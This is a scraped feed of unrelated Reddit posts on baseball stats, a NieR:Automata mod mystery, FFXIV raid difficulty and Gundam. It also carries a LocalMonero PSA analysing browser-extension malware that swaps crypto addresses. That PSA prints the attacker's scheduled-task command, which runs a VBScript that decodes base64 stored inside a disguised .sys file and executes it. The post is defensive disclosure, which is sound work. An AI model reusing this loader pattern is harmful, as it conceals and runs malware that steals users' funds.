(.480-.310/1.259)/.114 = 1.184 +1 = 2.184 (100)= 218.4 wRC+, which misses the mark on his true wRC+ of 207. Probably wouldn't get hired at Fangraphs with that margin of error but I'm not sure what else they're incorporating so shrug
Now for the fun part where we put Judge into the Mario Baseball scoring environment and Bowser into the MLB's, assuming they would both have the same numbers which probably isn't fair but is fun to look at:
Judge in Mario Baseball:
bb 136 0.724 98.464 1b 87 0.808 70.296 2b 28 1.189 33.292 3b 0 1.453 0 hr 62 1.982 122.884 324.936 pa 696 wOBA: 0.4668 
Bowser in the MLB:
bb+hbp 260 0.689 179.14 1b 36 0.884 31.824 2b 39 1.261 49.179 3b 2 1.601 3.202 hr 66 2.072 136.752 400.097 pa 696 wOBA: 0.5748 
Judge wRC+ in Mario Baseball: (.4668-.4148/1.0316)/.1757 = .2868 +1 = 1.2868 *100 = 128.7 wRC+ (compared to Bowser's 186.2) A wRC+ of 128 is just above King Boo's 127 and just under Donkey Kong's 130. 6th overall among all characters.
Bowser wRC+ in the MLB: (.5748-.310/1.259)/.114 = 1.845 +1 = 2.845 *100 = 284.5 wRC+ (compared to Judge's 218.4) 284 beats Bonds' 244 from 2002
In summary, it's a shame that MLB hasn't introduced the interuniversal draft yet. If you thought McCormick's catch was great, you should see Yoshi stick his tongue 7 feet out of his body to rob a gapper.
.
submitted by thanners27 to baseball [link] [comments]

PSA: We've discovered malware that replaces the crypto address you input without you knowing (not just clipboard replacement, way stealthier). Here's how it works.

Hey everyone,
LocalMonero is constantly on the lookout for new security threats that target our users. Around a week ago a user reported to us that the address that they specified when opening a trade wasn't actually the address to which the coins were sent to. Thinking this was a one-time fluke, the user opened another trade only to be faced with the same issue.
After the user got in touch with our support staff, he initially reported it as a bug. Upon examining the situation we asked the user to conduct some tests and record them. It was clear from the recordings provided by the user that we were actually dealing with a very devious form of malware here.
You should watch this video just to see how it works
As you can see, this doesn't work like the clipboard-replacing malware we've all heard about. Instead, this malware actually waits until you hit the submit button before replacing the address in a way that's hidden from you unless it errors out.
Not only that, it can also be seen from the video that even checking the settlement address on the trade page isn't effective, as the malware seems to be able to detect the address string and remove it entirely.

Not a bug

Hearing this our user was surprised to learn that this is malware as opposed to a bug. After all, the user had run a Windows Defender scan and it turned up nothing. Unfortunately, it seems that Windows Defender is inadequate in detecting these threats. After installing and running MalwareBytes, the user reported that the scan did, in fact, turn up quite the rap sheet of malware on their computer:
Folder: 10 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata\generated_indexed_rulesets, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSION\EDEMNCDRMPPKBRENLPCKDLJEFFJIJBLN, Quarantined, 5865, 1082968, 1.0.61045, , ame, , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\LMRCCAKLOJBFLLEIKNQECNQECDLOCKCQ, Quarantined, 5865, 1090470, 1.0.61045, , ame, , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata\generated_indexed_rulesets, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\IOIBMRBDFJBFECEIKOPRFMIFCDBCBRJQ, Quarantined, 5865, 1090470, 1.0.61045, , ame, , , File: 38 Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSION\EDEMNCDRMPPKBRENLPCKDLJEFFJIJBLN\3.1.5._0\RULES.JSON, Quarantined, 5865, 1082968, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata\generated_indexed_rulesets\_ruleset1, Quarantined, 5865, 1082968, , , , , 96CD8447C2055A5C002F8F47706D97D2, 126203311363ACC2DB796999DF99FB3ADD785F909F8E68B45DF1CAB55AD07F01 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\128.png, Quarantined, 5865, 1082968, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\content.bootstrap.js, Quarantined, 5865, 1082968, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\manifest.json, Quarantined, 5865, 1082968, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_block.js, Quarantined, 5865, 1082968, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_bnb.js, Quarantined, 5865, 1082968, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_cb.js, Quarantined, 5865, 1082968, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_common.js, Quarantined, 5865, 1082968, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_content.js, Quarantined, 5865, 1082968, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_gt.js, Quarantined, 5865, 1082968, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_kuc.js, Quarantined, 5865, 1082968, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\LMRCCAKLOJBFLLEIKNQECNQECDLOCKCQ\5.3.7._0\RULES.JSON, Quarantined, 5865, 1090470, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\128.png, Quarantined, 5865, 1090470, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\content.bootstrap.js, Quarantined, 5865, 1090470, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\manifest.json, Quarantined, 5865, 1090470, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_block.js, Quarantined, 5865, 1090470, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_bnb.js, Quarantined, 5865, 1090470, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_cb.js, Quarantined, 5865, 1090470, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_common.js, Quarantined, 5865, 1090470, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_content.js, Quarantined, 5865, 1090470, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_gt.js, Quarantined, 5865, 1090470, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_kuc.js, Quarantined, 5865, 1090470, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.BitCoinStealer, C:\WINDOWS\SYSTEM32\DRIVERS\QOTOP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.SYS, Quarantined, 3900, 1055561, 1.0.61045, , ame, , 842BB565271B118499304C2CCB07DD28, 8A59A9259522FF2FA06B5F01860862C0D200D8ECEB228E39855FB7C3ACF5D3EF Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\IOIBMRBDFJBFECEIKOPRFMIFCDBCBRJQ\4.4.6._0\RULES.JSON, Quarantined, 5865, 1090470, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata\generated_indexed_rulesets\_ruleset1, Quarantined, 5865, 1090470, , , , , 96CD8447C2055A5C002F8F47706D97D2, 126203311363ACC2DB796999DF99FB3ADD785F909F8E68B45DF1CAB55AD07F01 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\128.png, Quarantined, 5865, 1090470, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\content.bootstrap.js, Quarantined, 5865, 1090470, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\manifest.json, Quarantined, 5865, 1090470, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_block.js, Quarantined, 5865, 1090470, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_bnb.js, Quarantined, 5865, 1090470, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_cb.js, Quarantined, 5865, 1090470, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_common.js, Quarantined, 5865, 1090470, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_content.js, Quarantined, 5865, 1090470, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_gt.js, Quarantined, 5865, 1090470, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_kuc.js, Quarantined, 5865, 1090470, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.Tasker.Decoder, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975, Quarantined, 15659, 1055267, 1.0.61045, , ame, , 08D97ED74B014695C9110418D96472C4, 4DC2C05854644C918AF20E5CE3B255C74D3B126D49D1A548A6D7E4243C451C05 Trojan.BitCoinMiner.E, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Management\Provisioning\User, Quarantined, 3659, 1090462, 1.0.61045, , ame, , 934E89A3A99C184F1798775D4BE62CD4, D11427934919F664C3F27DF0E2DAECF71E1667BA6EA46D048832476C09B8F273 
As you can see, there's a bunch of Chrome and Edge (which are both derived from Chromium) browser extension files that are marked as Trojans, albeit BitcoinMiner as opposed to the BitcoinStealer system32 file. Don't be fooled by that, though. While it's true that antivirus software often labels harmless crypto software as malicious, in this particular case we weren't actually dealing with a legitimate mining extension but a malicious stealing one instead. The user had never installed any mining or crypto-related extensions.

How did we get here?

After conducting some more tests, decompiling the sys32 file, we seemed to have figured out that the sys32 file was a vbscript file. We later discovered a malicious Windows system task that was designed to run that file:
   Internet, Health \Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975    true PT59M   true PT59M     HighestAvailable AA-SURFACE\amer0 InteractiveToken    Parallel false false false  false false  true true false true PT0S 1    wscript.exe /e:vbscript /b "C:\Windows\System32\zYYdBt3ZQs\4AA2C936-A6E9-4413-9AA4-72BE7EF9CFC4" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\QoToP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.sys'), 2183100, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"    
And running that file seems to install the extensions on your Chromium-based browsers. Firefox-based browsers seem to be not affected by this. We figured this out when we were testing if the malware replaced the address in the Tor Browser (based on Firefox) too. It didn't, and no malicious extensions seem to have been present in the Tor browser. However, this is simply because the malware doesn't contain any Firefox extension, as opposed to some built in Firefox security feature. This is an important distinction to make, since Firefox is widely considered to be a secure browser by the general public despite being way behind Chromium in security according to some of the most prominent security researchers in the industry.
(As a sidenote, something like Ungoogled Chromium seems to be the best security/privacy desktop browser solution out there at this time.)

NoJS saves the day

During our tests to figure out the scope and MO of the malware, we managed to figure out that if you had our website running in NoJS mode you'd be safe from the effects of this particular malware despite having your browser compromised by the extension. When the user attempted to open the trade using the NoJS version of our site from the infected Chrome browser the malware was unable to replace the address. This isn't to say that NoJS would save you against all potential threats, but it certainly massively reduces the attack surface.

What do I need to look for?

Check out how the malicious extension looked like in the user's browser:
How the extension looks like (just an image, safe to click)
Extension permissions (just an image, safe to click)
Basically, the extension disguised itself as a Google Sheets extension. Pretty sneaky, like an Ork painted in purple. The dead giveaway, in this case, can be found in the extension permissions. Notice that it wants access to all sites and to block content on a page.

Conclusion

Malware sucks. It's easy to get and hard to get rid of. Keep your internet habits clean. Never open unknown links and never trust unknown files. When using LocalMonero, try sticking to NoJS mode for maximum security.
Stay safe!
P.S. We have the malware files quarantined, but we won't be publishing the link to download the malware here to prevent accidental infections. If there are any security researchers who wish to dissect them please PM me and we'll send you the link.
submitted by Alex_LocalMonero to CryptoCurrency [link] [comments]

Reddit user /u/sadfutago posts video of them entering previously undiscovered NieR:Automata area

A month ago, reddit user sadfutago posted on /NieRAutomataGame/, asking how to access the church. The community reaction was slight confusion because there is no known area that matched the description: A hidden door in the copied city at the back of the Adam fight. OP claimed that the door was accessible to them, but not to a friend (presumably on another console). After some prompting, OP posted another thread with these two images, indeed showing what looks like a church-like interior in the copied city. This room was definitely not known. They then posted a video of entering that door but with little other information, other than that it was supposedly recorded on a PS4. They didn't elaborate much at all. Community questions on the exact conditions of opening the door and what else is behind it remained unanswered.
Today, they post a video of going through the door and moving a bit further - climbing down a ladder and entering a twisted hallway. Again, neither are areas that are known to exist in the game. And again, there are no real/helpful answers from OP. Notably, the original "church" area is not part of either video.
The community currently has no idea whether this is real and if so, how to unlock the area. It's certainly not easily accessible on recent game versions and as of posting this, nobody has come out and managed to do so on a 1.0 PS4 version either.
Additional info:
Whatever this turns out to be, it's pretty on brand for Nier at this point.
Edit 1: 22-07-26, 7:40 UTC: This 3-year-old reddit thread turned up which contains a link to this imgur album presumably showing an early version of the Copied City whose model was left in the game files. There are plenty of minor differences, but most notably a large church-like structure behind the elusive hidden door. That structure (and the other minor differences) is not visible in the current game version nor the footage with the hidden door. But it also being a church in that exact spot is absolutely noteworthy. This church model has been reused from Bayonetta 2, another Platinum game, as this reddit thread points out.
Edit 2: 22-07-26, 10:55 UTC: OP just returned with a longer video of them entering the door, going down the ladder, through the twisted hallway and all the way into the church. Once the door opens, a short cutscene plays (using dialogue from when A2 discovers a recovery unit) and showing a white, child-like figure lying on the altar with a Lunar Tear sprouting from it. Additionally, there's a glitched figure (made from black boxes, like the things in 9S' later sequences) in the church. These two seem like references to Yonah and the Shadowlord of the previous game, NieR Replicant/Gestalt. You can also make out two staves which look identical to the ones wielded by Devola and Popola at the end of NieR Replicant/Gestalt. There is also a locked chest in there but as OP isn't on 9S, they can't open it.
Edit 3: 22-07-26, 20:13 UTC: Yoko Taro tweeted in response to questions regarding this find, but only pointed at his twitter profile which states that he does not answer questions about his products. It has also been pointed out numerous times that OP's username "sadfutago" may give away that this isn't just some kid. "futago" means "twins" in Japanese and NieR definitely has characters for whom that description would fit. However, they have indicated that they picked this name because of a clan with the same name in Naruto.
Edit 4: 22-07-27 12:50 UTC: A (now deleted) mod titled "Church" turned up on NexusMods, uploaded by a user named sadfutago. It only contained a text file with some cryptic numbers in the title and the binary encoded song lyrics from a Drakengard song. Here's a reddit thread with more info and screenshots. Note that there is no confirmed link to the reddit user of the same name. There's nothing here that a random person trying to cash in on the hype couldn't have done with what's already available.
Edit 5: 22-07-28 05:07 UTC: OP uploaded another video to reddit, returning to the church as 9S. It shows the bird fountain from NierR Replicant/Gestalt's ending in a corner which we previously didn't see. It can be interacted with but only has "..." dialogue. More importantly, 9S can open the chest which contains a lore text regarding Yonah which was already elsewhere in the game. After that, the black block creature becomes attackable/hostile. It appears to be the same fight as in 9S' memory deletion sequence in Automata's route C. The video shows him losing the fight as the enemy deals a lot of damage. sadfutago made other threads stating that they failed to beat the enemy multiple times, but just now made another claiming they did beat it and are uploading the video now.
Edit 6: 22-07-28 05:39 UTC: OP posted another video, successfully beating the fight. The black figure collapses with no further interaction possible. OP is now able to interact with the bird fountain, though the text is in Japanese (the rest of their game is English). Like the original, it asks a question and giving the (supposedly) wrong answer sends you back to the start (of the twisted hallway). OP returns to the same dialgue prompt, but only ever chooses the first (wrong) answer, meaning they're sent back again and again. It appears the Japanese question and possible answers are the same as in the Nier Replicant/Gestalt.
Edit 7: 22-07-29 04:07 UTC: sadfutago has posted five screenshots (as separate threads) on /nier, titled "z", "e", "3", "4", and "zinnia" featureing a wholly new area with no further comments. The screenshots show several artistic angles of huge female statue-like figures upside down with one arm extended downards, at least one towards for a lunar tear on the ground. The two statues we see with some detail to them seem to be the characters Zero and Two from Drakengard 3, the other Yoko Taro game series which has some connection to NieR. The naming of the threads also points towards that game as it also prominently features the characters One, Three, Four, and Five. The base of the statues, where the legs should be, appear to be gigantic flower petals, another callback to the Drakengard series but something that also featured in the added ending in NieR Replicant's remake. "Zinnia", finally, is the name of the creator of the first YoRHa androids in the Nier world, including prototypes for Number 2 and Number 9. He is never even mentioned in the game, only in supplementary material so we don't know what he looks like. The image titled such, however, has strong similarities with Drakengard 3's Two. With this, it's quite clear that sadfutago is not just some kid.
Edit 8: 22-07-29 04:35 UTC: Over on /nier, in a new thread, a user points toward the very ending of the Drakengard 3 Prelude Book which features the founding of a church and a hidden door which leads to a room "that no one was supposed to know about". Screenshots of the relevant book pages inside.
Edit 9: 22-07-29 05:33 UTC: sadfutago updated their reddit user profile with the text "www.twitch.tv/ze34_zinnia >三時間", the Japanese portion translating to "3 hours". The corresponding Twitch account was created today with the channel description "finale". They also just made a reddit thread with the same title. edit9.1 Minor change in the reddit profile (~20 minutes later): It now reads "www.twitch.tv/ze34_zinnia >三時間 ARGじゃない Officialじゃない". The characters "ゃない" mean a negation, so not and ARG and not Official. edit9.2 And another change in the profile, down to "> 2 hours". edit9.3 We're at ">20 minutes?" now.
Edit 10: 22-07-29 07:43 UTC: Stream at https://www.twitch.tv/ze34_zinnia is live. Here is a youtube VOD of the whole thing if you just want to watch it for yourself. Stream contents: Brief piano music followed by 9S entering the secret door again, moving to the church, heacking the chest, and fighting the enemy. This is a more competent player than what we've seen and at level 99. They choose the "correct" options at the (still Japanese) bird fountain. After the last question, the screen fades to black and we enter the area with the upside-down statues. 9S moves towards the Lunar Tear and the screen fades to black again. We return to the location of the Adam boss fight, with three giant variants of the basic machine enemies which 9S dispatches. The screen fades to a text slide, confirming that this was the work of a modding team: DevolasRevenge, WoefulWolf, and RaiderB. They also announce that the modding tools used to create this will be made public, as will the mod we've been seeing this whole time. We then get a few discord conversations of them discussing putting this together as well as a meme compilation from stuff the community has created in the last few days as well as a short behind-the-scenes look. It appears this (the mod and the mystery) has been in the works for around half a year. And with that, the stream ends.
Edit 11: Here is the church mod to play through yourself And here are links to the modding tools: https://github.com/ArthurHeitmann/NierAutoRebuild https://github.com/WoefulWolf/NieR2Blender2NieR https://github.com/ArthurHeitmann/MrubyDecompiler
Thank you everyone, it's been a ride and a half.
I hate that this needs to be said, but it does: Please don't be an ass. Don't harass the folks involved. This stunt had tons of people on edge, greatly enjoying the mystery. That alone made it worthwhile. Even if this isn't the outcome you wanted, the modding possibilities that this will enable are undoubtably a great thing.
submitted by Angzt to Games [link] [comments]

"Is EX4 hard?" A light numerical analysis

The important preamble here is that difficulty is, of course, subjective, and no one can tell you how hard a fight is for you. But there are broad strokes that people generally agree with. This is an attempt to capture those broad strokes with some solid numbers that enable comparison with the new EX fight.
I'm keeping this as spoiler-free as possible (no mechanic details), but if you want to avoid all possible details of a fight you should probably avoid this.
A fight is essentially a dance of movements, and to capture the difficulty of a fight, I categorize the required movements as follows:
Here's the data for the four EW EX fights:
EX1 EX2 EX3 EX4
Moves 33 38 43 66
Tight moves 3 5 5 20
Observations 23 25 25 24
Role-based moves 0 6 8 19
Team-killing moves 0 5 3 17
Wiping moves 0 0 1 2
And here's some more data for P1S, P2S, and the 4th ShB EX fight:
P1S P2S ShB EX4
Moves 21 26 30
Tight moves 2 10 8
Observations 9 14 14
Role-based moves 11 13 6
Team-killing moves 4 13 0
Wiping moves 5 9 2
Some comparisons we can see are:
Some notes:
Message me if you'd like me to share the text files of how I classified each move in each fight.
submitted by LighthouseGd to ffxiv [link] [comments]

Season 2 Battle Pass Rewards

Season 2 Battle Pass Rewards submitted by og-reset to GundamEvolution [link] [comments]

PSA: We've discovered malware that replaces the Monero address you input without you knowing (not just clipboard replacement, way stealthier). Here's how it works.

Hey everyone,
LocalMonero is constantly on the lookout for new security threats that target our users. Around a week ago a user reported to us that the address that they specified when opening a trade wasn't actually the address to which the coins were sent to. Thinking this was a one-time fluke, the user opened another trade only to be faced with the same issue.
